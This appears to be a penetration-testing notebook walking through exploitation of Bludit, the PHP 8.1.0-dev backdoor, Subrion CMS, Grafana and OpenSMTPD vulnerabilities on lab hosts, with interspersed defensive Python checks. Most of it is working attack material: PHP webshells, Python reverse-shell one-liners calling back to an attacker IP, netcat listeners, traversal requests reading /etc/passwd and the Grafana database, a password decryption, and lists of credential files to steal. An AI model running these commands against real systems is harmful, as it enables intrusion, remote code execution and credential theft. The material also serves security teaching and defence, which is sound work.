Bludit 3.9.2 code execution – Path Traversal (Authenticated) (CVE-2019-16113)

Bludit could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper validation of file types. By uploading a specially-crafted image file, an attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the application.

PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

Affected Products

Bludit Bludit 3.9.2

Detect

1. Once authenticated as a low-privileged user, we can check the platform version by looking at the site's page source; in our case it is 3.9.2

2. You can also use curl to get the page source code, then filter by version

  • curl http://10.10.10.191/admin

Exploit

1. Knowing this version is vulnerable to CVE-2019-16113, we can try to upload an image: in the main page click on "Content", or visit http://10.10.10.191/admin/new-content

2. Click on "Images", choose the image and upload it

3. Click on "Insert", and then save the post

4. Now locate where the image is stored: open the publication, right click the image and click on "Open Image"; it takes you to the location of the file, in this case:

  • http://10.10.10.191/bl-content/uploads/pages/1b9f41ad138ee8e237ba29b827e1048a/test-image.jpg

5. Now that we know how to locate the file, we can try to upload PHP code. Repeat steps 1-4, but this time upload a file that contains code

  • vi exploit.php
  • <?php echo "Follow us." ?>

Note: we get a warning that only gif, png, jpg, jpeg and svg are permitted extensions. So, first we rename our file, then we try to upload it again.

  • mv exploit.php exploit.png

6. Now right click on that empty square, then click on the image, to find the location of the file

7. If we try to view this image it will give us an error

  • http://10.10.10.191/bl-content/uploads/pages/0782f3f4a2ac06cd19d47d03181433a7/exploit.png

8. Now, using Burp Suite, we will upload again and play with the HTTP request

9. We already know the path where the files are saved (/bl-content/uploads/pages/0782f3f4a2ac06cd19d47d03181433a7/exploit.png), so we can abuse the variable named "uuid" to set the path where the file will be saved. Send this request to Burp Suite Repeater and set the value to one of:

  • ../../tmp
  • (ALTERNATIVE) ../../uploads

Note: this will create the file and folder if necessary; in the response we need to see "Images Uploaded" with a 200 OK server response code

10. Now locate the file within the specified directory

  • http://10.10.10.191/bl-content/tmp/

11. Open the file, and the PHP code should be executed

  • http://10.10.10.191/bl-content/tmp/exploit.png

12. Now, using the same request in Burp Suite Repeater, we can modify the code to execute; in this case I will use a GET variable (cmd) to pass the command to execute, and I will also change the filename to exploit2.png

  • <?php echo shell_exec($_GET['cmd']); ?>

13. Check the location again and find the new file

  • http://10.10.10.191/bl-content/tmp/

14. Open the file; in the URL use the cmd variable to execute code. We will first try the whoami command

  • http://10.10.10.191/bl-content/tmp/exploit2.png?cmd=whoami

15. Knowing we can now execute commands, we can try to run a reverse shell. First start a listener on the local attacker machine

  • nc -lvp 4444

16. Now use python to execute the reverse shell connection

  • http://10.10.10.191/bl-content/tmp/exploit2.png?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

17. Looking at the listener we should have a connection back
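As an added example (not Bludit's code), the Python below models the two server-side checks that would stop the procedure above: the uuid parameter is accepted only as a 32-hex page id that resolves inside the uploads root, and an upload must start with the magic bytes of the image type its extension claims, so a renamed exploit.png containing PHP is rejected. The install path, the uuid format and the SVG handling are assumptions.

```python
# Added example (not Bludit's code): the two server-side checks that block the
# upload abuse shown above. Constants below are assumptions about the layout.
import os
import re

UPLOAD_ROOT = "/var/www/bludit/bl-content/uploads/pages"  # assumed install path
ALLOWED_EXT = {"gif", "png", "jpg", "jpeg", "svg"}        # allow-list from the warning above
UUID_RE = re.compile(r"^[0-9a-f]{32}$")                   # page id format seen in the URLs above

# Leading bytes of the binary image formats in the allow-list.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def resolve_upload_dir(uuid: str, root: str = UPLOAD_ROOT) -> str:
    """Map the uuid parameter to a directory, rejecting anything that is not a
    plain page id or that resolves outside the uploads root (e.g. ../../tmp)."""
    if not UUID_RE.match(uuid):
        raise ValueError("uuid must be 32 hex characters")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, uuid))
    if os.path.commonpath([root_real, target]) != root_real:
        raise ValueError("uuid resolves outside the uploads root")
    return target


def content_matches_extension(filename: str, data: bytes) -> bool:
    """True only when the extension is allowed AND the bytes look like that
    format; a '<?php' body renamed to .png passes the first test, not the second."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False
    if ext == "svg":
        # SVG is text: it must open as XML or <svg>, and may carry no PHP open tag.
        body = data.lstrip().lower()
        opens_ok = body.startswith(b"<svg") or body.startswith(b"<?xml")
        return opens_ok and b"<?php" not in body and b"<?=" not in body
    return data.startswith(MAGIC[ext])


def validate_upload(uuid: str, filename: str, data: bytes) -> str:
    """Return the destination path for a valid upload, else raise ValueError."""
    directory = resolve_upload_dir(uuid)
    if not filename or "/" in filename or "\\" in filename or filename in (".", ".."):
        raise ValueError("bad filename")
    if not content_matches_extension(filename, data):
        raise ValueError("content does not match an allowed image type")
    return os.path.join(directory, filename)
```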

Extra

1. Having access to the server, we can look for users and passwords that can be used to exploit further. Move your console to the root directory of the web application, in my case /var/www/bludit-3.9.2

  • cd /var/www/bludit-3.9.2
  • find . -name users.php 2> /dev/null

2. We can read those files and look for user evidence

  • cat ./bl-content/databases/users.php

Remedy

See vendor documentation, and upgrade to a recent version.

Resources

https://www.exploit-db.com/exploits/47699


https://packetstormsecurity.com/files/155295

https://github.com/ynots0ups/CVE-2019-16113

https://github.com/advisories/GHSA-ch69-hjrw-4hf3

https://packetstormsecurity.com/files/155295/Bludit-Directory-Traversal-Image-File-Upload.html

 

Bludit 3.9.2 – Auth Bruteforce Bypass (CVE-2019-17240)

Bludit could allow a remote attacker to bypass security restrictions, caused by a flaw in bl-kernel/security.class.php. By using many different forged X-Forwarded-For or Client-IP HTTP headers, an attacker could exploit this vulnerability to bypass a brute-force protection mechanism.

Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of the anti-brute-force mechanism that is in place to block users that have attempted to log in incorrectly 10 times or more. Within the bl-kernel/security.class.php file, there is a function named getUserIp which attempts to determine the true IP address of the end user by trusting the X-Forwarded-For and Client-IP HTTP headers:

The reasoning behind the checking of these headers is to determine the IP address of end users who are accessing the website behind a proxy, however, trusting these headers allows an attacker to easily spoof the source address. Additionally, no validation is carried out to ensure they are valid IP addresses, meaning that an attacker can use any arbitrary value and not risk being locked out.

As can be seen in the content of the log file below (found in bl-content/databases/security.php), submitting a login request with an X-Forwarded-For header value of FakeIp was processed successfully, and the failed login attempt was logged against the spoofed string:

By automating the generation of unique header values, prolonged brute force attacks can be carried out without risk of being blocked after 10 failed attempts, as can be seen in the demonstration video below in which a total of 51 attempts are made prior to recovering the correct password.
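As an added example (not Bludit's code), the Python below places a model of the header-trusting lookup described above beside a version that consults X-Forwarded-For or Client-IP only when the direct peer is a known reverse proxy and ignores values that are not syntactically valid IP addresses. The trusted proxy address, the header precedence and the peer address in the simulation are assumptions; the threshold of 10 is the one stated in the text.

```python
# Added example (not Bludit's code): how the lockout key should be derived.
# TRUSTED_PROXIES, the header precedence and the threshold are assumptions.
import ipaddress
from collections import defaultdict

TRUSTED_PROXIES = {"10.0.0.5"}   # assumed address of the site's own reverse proxy
MAX_FAILED = 10                  # lockout threshold stated in the text


def get_user_ip_vulnerable(remote_addr: str, headers: dict) -> str:
    """Model of the behaviour described above: any header value is used verbatim,
    so the requester picks the key the failed attempt is counted against."""
    h = {k.lower(): v for k, v in headers.items()}
    return h.get("client-ip") or h.get("x-forwarded-for") or remote_addr


def _as_ip(value):
    """Canonical string for a syntactically valid IPv4/IPv6 address, else None."""
    try:
        return str(ipaddress.ip_address(str(value).strip()))
    except ValueError:
        return None


def get_user_ip(remote_addr: str, headers: dict) -> str:
    """Consult proxy headers only when the socket peer is a trusted proxy, take
    the address that proxy appended last, and ignore values that are not IPs."""
    peer = _as_ip(remote_addr) or remote_addr
    if peer not in TRUSTED_PROXIES:
        return peer                      # direct client: headers are untrusted
    h = {k.lower(): v for k, v in headers.items()}
    hops = [x for x in h.get("x-forwarded-for", "").split(",") if x.strip()]
    client = _as_ip(hops[-1]) if hops else None
    if client is None:
        client = _as_ip(h.get("client-ip", ""))
    return client or peer                # malformed header: count against the proxy


class LoginGuard:
    """Counts failed logins per key and blocks once MAX_FAILED is reached."""

    def __init__(self, ip_func):
        self.ip_func = ip_func
        self.failures = defaultdict(int)

    def record_failure(self, remote_addr, headers):
        self.failures[self.ip_func(remote_addr, headers)] += 1

    def is_blocked(self, remote_addr, headers) -> bool:
        return self.failures[self.ip_func(remote_addr, headers)] >= MAX_FAILED


def simulate(attempts: int = 51, peer: str = "203.0.113.9"):
    """Replay the spoofed-header attack from the text: every attempt carries a
    fresh X-Forwarded-For string. Returns (blocked_vulnerable, blocked_fixed)."""
    vuln, fixed = LoginGuard(get_user_ip_vulnerable), LoginGuard(get_user_ip)
    for i in range(attempts):
        hdr = {"X-Forwarded-For": f"FakeIp{i}"}   # constructed, like the FakeIp entry above
        vuln.record_failure(peer, hdr)
        fixed.record_failure(peer, hdr)
    probe = {"X-Forwarded-For": "FakeIp-next"}
    return vuln.is_blocked(peer, probe), fixed.is_blocked(peer, probe)
```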

Affected versions

Bludit 3.9.2

Detect

1. Access the Bludit main page

2. Check the source code of the login page; in the HTML header you can find the application version

Exploit (Script 1)

1. This script runs a list of passwords against a single user (you have to know the username)

  • git clone https://github.com/pingport80/CVE-2019-17240.git
  • cd CVE-2019-17240

2. Run the script, enter the username and the path to the password file; you can also set the number of threads to use. Once the script finds a match it will stop automatically

  • python3 brute.py -u http://10.10.10.191/admin/ -user fergus -w ../wordlist.txt -t 20

Remedy

Update to a version later than 3.9.2 or apply the patch found at https://github.com/bludit/bludit/pull/1090

Resources

https://github.com/bludit/bludit/pull/1090

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17240

https://www.exploit-db.com/exploits/48746

https://packetstormsecurity.com/files/158875

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

https://github.com/pingport80/CVE-2019-17240

 

PHP 8.1.0-dev Backdoor Remote Code Execution (RCE)

PHP version 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending a User-Agentt header.

The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.

Identification

1. One way to identify whether a website is using PHP 8.1.0-dev is to make a request with curl and print the response headers, then look at the server response

  • curl --head http://10.10.10.242

2. This can also be obtained from Burp Suite, in the server response

Exploitation

Script 1 (PHP 8.1.0-dev – ‘User-Agentt’ Remote Code Execution)

1. This script automatically exploits the User-Agentt header and provides a shell (https://www.exploit-db.com/exploits/49933)

  • curl https://www.exploit-db.com/download/49933 -o exploit.py
  • ls -l exploit.py

2. Run it against the vulnerable web site

  • python3 exploit.py
  • http://10.10.10.242/
  • whoami

Script 2 (Reverse Shell)

1. Download the script from (https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py)

2. I named the file exploit2.py

  • python3 exploit2.py -h

3. Start a listener, in the attacker machine

  • nc -lvp 3333

4. Run the command with the following data

  • python3 exploit2.py http://10.10.10.242/ 10.10.14.6 3333

5. Check the listener, and there should be a connection back

Remedy

Upgrade to a newer version; visit the vendor information for more details

Resources

https://www.exploit-db.com/exploits/49933

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

 

Subrion CMS 4.2.1 – Arbitrary File Upload (Authenticated) – CVE-2018-19422

Subrion CMS could allow a remote authenticated attacker to upload arbitrary files, caused by the improper validation of file extensions by the /panel/uploads URI. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system.

/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.

Affected version

  • 4.2.1

Identification

1. To identify the version of the Subrion application you can navigate to /panel/

  • http://ip/panel/
  • http://exfiltrated.offsec/login/

2. You can use curl to get the page info

  • curl http://exfiltrated.offsec/panel/ | grep -i Subrion

Exploitation (Script)

1. Now that we know the Subrion CMS version, we can search for exploits that apply

  • searchsploit Subrion 4.2.1

2. Looking at the results, I would use the "Arbitrary File Upload" one (https://www.exploit-db.com/exploits/49876), so I download it

  • searchsploit -m php/webapps/49876.py
  • python 49876.py

3. After a successful download, we proceed to test the script. We need to provide credentials as this is an authenticated attack; you can brute force the credentials or try the default ones, admin/admin. In my case the default credentials were set

  • python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
  • whoami

Exploitation (Manual)

1. Having already the credentials proceed to log into the Subrion CMS console

  • http://exfiltrated.offsec/panel/
  • admin/admin

2. Once authenticated, go to http://[address]:[port]/[app_path]/panel/uploads

  • http://exfiltrated.offsec/panel/uploads/

3. We will create a PHP file that prints text as a proof of concept; the file extension should be either .pht or .phar

  • vi php_poc.phar
  • cat php_poc.phar
  • <?php echo "Vry4n was here!"; ?>

4. Proceed to upload it to Subrion CMS, and check the location, in this case (uploads/php_poc.phar)

5. Navigate to that location; as you can see, the code has been executed

  • http://exfiltrated.offsec/uploads/php_poc.phar

6. Now we can upload a basic line of code to prove we can run commands

  • vi php_code.phar
  • cat php_code.phar
  • <?php system($_GET['cmd']); ?>

7. Repeat the upload step, and visit the file, then use the variable cmd followed by the command you need

  • http://exfiltrated.offsec/uploads/php_code.phar?cmd=whoami

8. We can run a python reverse shell, start a local listener in our attacking machine

  • nc -lvp 1234

9. I used https://www.revshells.com/ to create a python3 reverse shell

  • http://exfiltrated.offsec/uploads/php_code.phar?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.79",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
  • whoami

Extra

1. We can also use a webshell; we will edit the one shipped with our local Kali machine, /usr/share/webshells/php/php-reverse-shell.php

  • cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/php-reverse-shell.php
  • cd ~/Desktop
  • mv php-reverse-shell.php php-reverse-shell.phar
  • vi php-reverse-shell.phar

2. Start a listener

  • nc -lvp 1234

3. Upload it to the Subrion CMS and then request the .phar file; we should get a connection back

  • http://exfiltrated.offsec/uploads/php-reverse-shell.phar
  • whoami

Remedy

No remedy available as of November 14, 2018.

Resources

https://github.com/intelliants/subrion/issues/801

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19422

https://packetstormsecurity.com/files/162591

https://www.exploit-db.com/exploits/49876

https://www.cvedetails.com/cve/CVE-2018-19422/

 

Grafana 8.3.0 – Directory Traversal and Arbitrary File Read – CVE-2021-43798

Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/<plugin-id>/`, where `<plugin-id>` is the plugin ID of any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.

Every Grafana instance comes with pre-installed plugins like the Prometheus plugin or MySQL plugin so the following URLs are vulnerable for every instance:

  • <grafana_host_url>/public/plugins/alertlist/
  • <grafana_host_url>/public/plugins/annolist/
  • <grafana_host_url>/public/plugins/barchart/
  • <grafana_host_url>/public/plugins/bargauge/
  • <grafana_host_url>/public/plugins/candlestick/
  • <grafana_host_url>/public/plugins/cloudwatch/
  • <grafana_host_url>/public/plugins/dashlist/
  • <grafana_host_url>/public/plugins/elasticsearch/
  • <grafana_host_url>/public/plugins/gauge/
  • <grafana_host_url>/public/plugins/geomap/
  • <grafana_host_url>/public/plugins/gettingstarted/
  • <grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
  • <grafana_host_url>/public/plugins/graph/
  • <grafana_host_url>/public/plugins/heatmap/
  • <grafana_host_url>/public/plugins/histogram/
  • <grafana_host_url>/public/plugins/influxdb/
  • <grafana_host_url>/public/plugins/jaeger/
  • <grafana_host_url>/public/plugins/logs/
  • <grafana_host_url>/public/plugins/loki/
  • <grafana_host_url>/public/plugins/mssql/
  • <grafana_host_url>/public/plugins/mysql/
  • <grafana_host_url>/public/plugins/news/
  • <grafana_host_url>/public/plugins/nodeGraph/
  • <grafana_host_url>/public/plugins/opentsdb
  • <grafana_host_url>/public/plugins/piechart/
  • <grafana_host_url>/public/plugins/pluginlist/
  • <grafana_host_url>/public/plugins/postgres/
  • <grafana_host_url>/public/plugins/prometheus/
  • <grafana_host_url>/public/plugins/stackdriver/
  • <grafana_host_url>/public/plugins/stat/
  • <grafana_host_url>/public/plugins/state-timeline/
  • <grafana_host_url>/public/plugins/status-history/
  • <grafana_host_url>/public/plugins/table/
  • <grafana_host_url>/public/plugins/table-old/
  • <grafana_host_url>/public/plugins/tempo/
  • <grafana_host_url>/public/plugins/testdata/
  • <grafana_host_url>/public/plugins/text/
  • <grafana_host_url>/public/plugins/timeseries/
  • <grafana_host_url>/public/plugins/welcome/
  • <grafana_host_url>/public/plugins/zipkin/

Affected Products

  • All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.
  • Grafana Grafana 8.0.0
  • Grafana Grafana 8.3.0

Enumeration

1. We can reach the log in screen and find out about the Grafana version, in our case this is using port 3000 (Version v8.3.0 (914fcedb72))

  • http://192.168.227.181:3000/login

2. Using curl we can also query the /login page

  • curl http://192.168.227.181:3000/login | grep "Grafana v"

Exploit (Script)

1. Having identified the version of the application, we can confirm whether it is vulnerable. We will use an automated exploit (https://www.exploit-db.com/exploits/50581); I will download it using searchsploit

  • searchsploit grafana
  • searchsploit -m multiple/webapps/50581.py

2. Now, we can try to use the script to read files

  • python 50581.py -H http://192.168.227.181:3000
  • /etc/passwd

3. We can try all the known readable config files to find interesting information. Next we look for Grafana config files; based on the documentation (https://github.com/grafana/grafana/blob/main/conf/defaults.ini), /etc/grafana/grafana.ini seems interesting, since it can hold user/password info under the Security section

  • python 50581.py -H http://192.168.227.181:3000
  • /etc/grafana/grafana.ini

Exploit (Manual)

1. We can use curl to read files

  • curl --path-as-is http://192.168.227.181:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

2. We can also read a database file and store it on our PC; this is the Grafana database

  • curl --path-as-is http://192.168.227.181:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
  • ls -l grafana.db

3. Now we can use sqlite3 to read this database file; the data_source table holds user information

  • sqlite3 grafana.db
  • .tables
  • select * from data_source;

Note: Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default.

4. Having the username and the encrypted password, we can proceed to decrypt it

  • basicAuthPassword":"anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
  • sysadmin

Decrypt the password using a script

1. We can now decrypt the password using a script found on the internet (https://github.com/jas502n/Grafana-CVE-2021-43798)

  • git clone https://github.com/jas502n/Grafana-CVE-2021-43798.git
  • cd Grafana-CVE-2021-43798
  • ls

2. Try to run the script; if you run into errors, it might mean you need to install dependencies

  • go run AESDecrypt.go
  • go env -w GO111MODULE=off
  • go run AESDecrypt.go

3. As we got the error "cannot find package "golang.org/x/crypto/pbkdf2" in any of", we install pbkdf2

  • go get golang.org/x/crypto/pbkdf2

4. Now try to run the application

  • go run AESDecrypt.go

5. Since the script includes variables with default values we need to change those to match our credentials:

  • secret_key (found in /etc/grafana/grafana.ini) = SW2YcwTIb9zpOOhoPsMm
  • dataSourcePassword (found in /var/lib/grafana/grafana.db) = anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

6. Edit the script

  • vi AESDecrypt.go

7. Run the script again, the results should be the decrypted password

  • go run AESDecrypt.go

8. (EXTRA) The result is SuperSecureP@ssw0rd; we can try this password with the user found in /var/lib/grafana/grafana.db to SSH into this host

  • ssh sysadmin@192.168.171.181

(EXTRA) Interesting files for LFI

  • /conf/defaults.ini
  • /etc/grafana/grafana.ini
  • /etc/passwd
  • /etc/shadow
  • /home/grafana/.bash_history
  • /home/grafana/.ssh/id_rsa
  • /root/.bash_history
  • /root/.ssh/id_rsa
  • /usr/local/etc/grafana/grafana.ini
  • /var/lib/grafana/grafana.db
  • /proc/net/fib_trie
  • /proc/net/tcp
  • /proc/self/cmdline

These are directories; fuzzing them can help discover plugins

  • /usr/share/grafana/public/app/plugins/datasource
  • /usr/share/grafana/public/app/plugins/

(EXTRA) Different ways to exploit LFI

  • /public/plugins/alertGroups/../../../../../../../../etc/passwd
  • /public/plugins/alertlist/../../../../../../../../etc/passwd
  • /public/plugins/alertmanager/../../../../../../../../etc/passwd
  • /public/plugins/annolist/../../../../../../../../etc/passwd
  • /public/plugins/barchart/../../../../../../../../etc/passwd
  • /public/plugins/bargauge/../../../../../../../../etc/passwd
  • /public/plugins/canvas/../../../../../../../../etc/passwd
  • /public/plugins/cloudwatch/../../../../../../../../etc/passwd
  • /public/plugins/dashboard/../../../../../../../../etc/passwd
  • /public/plugins/dashlist/../../../../../../../../etc/passwd
  • /public/plugins/debug/../../../../../../../../etc/passwd
  • /public/plugins/elasticsearch/../../../../../../../../etc/passwd
  • /public/plugins/gauge/../../../../../../../../etc/passwd
  • /public/plugins/geomap/../../../../../../../../etc/passwd
  • /public/plugins/gettingstarted/../../../../../../../../etc/passwd
  • /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
  • /public/plugins/grafana/../../../../../../../../etc/passwd
  • /public/plugins/graph/../../../../../../../../etc/passwd
  • /public/plugins/graphite/../../../../../../../../etc/passwd
  • /public/plugins/heatmap/../../../../../../../../etc/passwd
  • /public/plugins/histogram/../../../../../../../../etc/passwd
  • /public/plugins/influxdb/../../../../../../../../etc/passwd
  • /public/plugins/jaeger/../../../../../../../../etc/passwd
  • /public/plugins/live/../../../../../../../../etc/passwd
  • /public/plugins/logs/../../../../../../../../etc/passwd
  • /public/plugins/loki/../../../../../../../../etc/passwd
  • /public/plugins/mixed/../../../../../../../../etc/passwd
  • /public/plugins/mssql/../../../../../../../../etc/passwd
  • /public/plugins/mysql/../../../../../../../../etc/passwd
  • /public/plugins/news/../../../../../../../../etc/passwd
  • /public/plugins/nodeGraph/../../../../../../../../etc/passwd
  • /public/plugins/opentsdb/../../../../../../../../etc/passwd
  • /public/plugins/piechart/../../../../../../../../etc/passwd
  • /public/plugins/pluginlist/../../../../../../../../etc/passwd
  • /public/plugins/postgres/../../../../../../../../etc/passwd
  • /public/plugins/prometheus/../../../../../../../../etc/passwd
  • /public/plugins/stat/../../../../../../../../etc/passwd
  • /public/plugins/state-timeline/../../../../../../../../etc/passwd
  • /public/plugins/status-history/../../../../../../../../etc/passwd
  • /public/plugins/table-old/../../../../../../../../etc/passwd
  • /public/plugins/table/../../../../../../../../etc/passwd
  • /public/plugins/tempo/../../../../../../../../etc/passwd
  • /public/plugins/testdata/../../../../../../../../etc/passwd
  • /public/plugins/text/../../../../../../../../etc/passwd
  • /public/plugins/timeseries/../../../../../../../../etc/passwd
  • /public/plugins/welcome/../../../../../../../../etc/passwd
  • /public/plugins/xychart/../../../../../../../../etc/passwd
  • /public/plugins/zipkin/../../../../../../../../etc/passwd

Remedy

Upgrade to the latest version of Grafana (8.0.7, 8.1.8, 8.2.7, 8.3.1 or later). If you cannot upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability.
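As an added example (not Grafana's code), the Python below shows the path normalization a reverse proxy in front of Grafana should apply before forwarding, and reuses it to flag traversal requests in web server access logs. The log lines are constructed, modelled on the two curl requests in the manual section, and the log format is assumed to be the common combined format.

```python
# Added example (not Grafana's code): the normalization a reverse proxy in front
# of Grafana should apply, reused here to flag traversal requests in access logs.
import posixpath
import re
from urllib.parse import unquote

PLUGIN_PREFIX = "/public/plugins/"
# Client address and request field of a common-log-format line: "GET /path HTTP/1.1"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample, modelled on the two curl requests in the manual section.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.7 - - [07/Dec/2021:10:01:05 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 524288
198.51.100.4 - - [07/Dec/2021:10:02:11 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 9021
198.51.100.4 - - [07/Dec/2021:10:02:12 +0000] "GET /login HTTP/1.1" 200 3412
"""


def normalize_path(raw: str) -> str:
    """What the proxy should forward: query stripped, percent-decoded (twice, so a
    doubly encoded dot segment does not survive), '.' and '..' segments collapsed."""
    path = raw.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    norm = posixpath.normpath(path)
    return norm if norm.startswith("/") else "/" + norm


def traversal_target(raw: str):
    """For a /public/plugins/<id>/... request, return the resolved path when it
    escapes that plugin's directory, else None."""
    norm = normalize_path(raw)
    decoded = unquote(unquote(raw.split("?", 1)[0]))
    if not decoded.startswith(PLUGIN_PREFIX):
        return None
    plugin = decoded[len(PLUGIN_PREFIX):].split("/", 1)[0]
    if not plugin:
        return None
    plugin_dir = PLUGIN_PREFIX + plugin
    if norm == plugin_dir or norm.startswith(plugin_dir + "/"):
        return None
    return norm


def scan_log(lines):
    """Return one dict per request whose raw path escapes its plugin directory."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        target = traversal_target(m.group("path"))
        if target is not None:
            hits.append({"ip": m.group("ip"), "raw": m.group("path"), "resolved": target})
    return hits
```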

Resources

https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p

https://packetstormsecurity.com/files/165221

https://exchange.xforce.ibmcloud.com/vulnerabilities/214666

https://www.exploit-db.com/exploits/50581

https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/

 

OpenSMTPD < 6.6.1 - Remote Code Execution (smtp_mailaddr) - CVE-2020-7247

OpenSMTPD could allow a remote attacker to gain elevated privileges on the system, caused by improper handling of user input. By sending a specially-crafted mail request, an attacker could exploit this vulnerability to execute arbitrary code on the system as root.

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the “uncommented” default configuration. The issue exists because of an incorrect return value upon failure of input validation.
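As an added example (not OpenSMTPD's source), the Python below is a simplified model of the smtp_mailaddr() decision logic: the 6.6.0 version treats an address with no domain as a local user and returns success even though the local-part check had already failed, and the fixed version returns failure in that case. The allowed local-part character set, the simplified domain check and the fallback hostname are assumptions.

```python
# Added example (not OpenSMTPD's source): a simplified model of the smtp_mailaddr()
# decision logic, vulnerable and fixed. MAILADDR_ALLOWED and the hostname are assumptions.
import re

MAILADDR_ALLOWED = "!#$%&'*/?^`{|}~+-=_"   # assumed atext set; note ';' and ' ' are absent
LOCAL_HOSTNAME = "mail.example"             # stand-in for the server's own hostname


def valid_localpart(s: str) -> bool:
    """Dot-separated atoms made only of letters, digits and MAILADDR_ALLOWED."""
    if not s:
        return False
    for atom in s.split("."):
        if not atom or not all(c.isalnum() or c in MAILADDR_ALLOWED for c in atom):
            return False
    return True


def valid_domainpart(s: str) -> bool:
    """Simplified: non-empty, hostname characters only."""
    return re.fullmatch(r"[A-Za-z0-9.-]+", s) is not None


def parse_address(text: str):
    """Split '<user@domain>' into (user, domain); domain is '' when absent."""
    inner = text.strip()
    if inner.startswith("<") and inner.endswith(">"):
        inner = inner[1:-1]
    user, sep, domain = inner.rpartition("@")
    return (user, domain) if sep else (inner, "")


def smtp_mailaddr_vulnerable(user, domain, mailfrom):
    """6.6.0 behaviour: the 'no domain, local user' branch returns success without
    caring that valid_localpart() already failed, so shell metacharacters get through."""
    if not valid_localpart(user) or not valid_domainpart(domain):
        if mailfrom and user == "" and domain == "":
            return True, ""                     # empty return-path, needed for bounces
        if user == "":
            return False, None                  # no user part: reject
        if domain == "":
            return True, LOCAL_HOSTNAME         # BUG: accepts an invalid local part
        return False, None
    return True, domain


def smtp_mailaddr_fixed(user, domain, mailfrom):
    """Same structure, but the local-user shortcut only applies when the local
    part itself is valid; an invalid one is a validation failure and is rejected."""
    if not valid_localpart(user) or not valid_domainpart(domain):
        if mailfrom and user == "" and domain == "":
            return True, ""
        if user == "":
            return False, None
        if domain == "" and valid_localpart(user):
            return True, LOCAL_HOSTNAME
        return False, None
    return True, domain
```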

Affected Products

  • OpenSMTPD OpenSMTPD 6.4.0
  • OpenSMTPD OpenSMTPD 6.4.1
  • OpenSMTPD OpenSMTPD 6.4.2
  • OpenSMTPD OpenSMTPD 6.6.0
  • OpenSMTPD OpenSMTPD 6.6.1

Identify

1. Run a vulnerability scanner against the remote vulnerable server; in this case we are using Nessus

2. We can also identify this vulnerability using Nmap; in this case the smtp version is 2.0.0

  • nmap -p 25 --script smtp-commands 192.168.161.71

Exploitation Script

1. Knowing the service version, we can try to exploit this service, using an automated exploit (https://www.exploit-db.com/exploits/47984)

  • searchsploit smtpd
  • searchsploit -m linux/remote/47984.py

